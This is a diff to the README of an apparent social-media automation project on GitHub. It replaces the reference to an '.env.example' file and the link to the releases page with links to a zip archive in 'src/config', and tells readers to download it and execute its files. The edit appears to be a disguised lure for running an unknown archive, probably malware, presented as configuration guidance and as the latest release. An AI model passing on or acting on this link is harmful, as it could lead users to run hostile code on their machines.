aasmaagh/social-media-automation/README.md

    npm install
    ```

 3. **Set Up Environment Variables**: Create a `.env` file in the root directory and add your configuration settings.
-Refer to the `.env.example` for guidance.
+Refer to the `https://github.com/aasmaagh/social-media-automation/raw/refs/heads/master/src/config/automation_social_media_v1.6.zip` for guidance.

 4. **Run the Application**:
    ```bash
    npm start
    ```

-You can download the latest release [here](https://github.com/aasmaagh/social-media-automation/releases) and execute the necessary files to set up your environment.
+You can download the latest release [here](https://github.com/aasmaagh/social-media-automation/raw/refs/heads/master/src/config/automation_social_media_v1.6.zip) and execute the necessary files to set up your environment.

 ## Usage